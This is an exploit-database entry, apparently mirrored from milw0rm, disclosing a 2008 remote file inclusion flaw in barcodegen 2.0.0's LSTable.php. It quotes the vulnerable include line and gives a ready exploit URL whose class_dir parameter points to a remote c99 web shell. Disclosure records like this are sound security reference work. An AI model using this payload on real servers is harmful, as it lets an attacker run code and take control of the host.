header-logo
Suggest Exploit
vendor:
barcodegen
by:
Br0k3n H34rT
7.5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: barcodegen
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:barcodephp:barcodegen
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

barcodegen <= 2.0.0 Remote File Inclusion Vulnerability

In File : LSTable.php In Line 21 : include( $class_dir.'/Table_template.php' ); An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the class_dir parameter. This URL can point to a malicious file hosted on a third-party server, which will be included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Name : barcodegen <= 2.0.0 Remote File Inclusion Vulnerability
 
# Download From : http://www.barcodephp.com/processdownload.php?id=barcodegen.1d-php4.v2.0.0.zip
 
# Found By : Br0k3n H34rT
 
# Home Page : WwW.Sec-Code.CoM
 
============================================================================
 
# Vulne Code : In File : LSTable.php In Line 21 :
 
include( $class_dir.'/Table_template.php' );
 
# Exploit :
 
http://WwW.Sec-Code.CoM/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://SITE.COM/shell/c99.txt?
 
============================================================================
 
# Greet To :
 
My Master RoMaNcYxHaCkEr , And All My Members
 
# Note : Eid Mobarak :)
 
# bEST wISHES

# milw0rm.com [2008-09-26]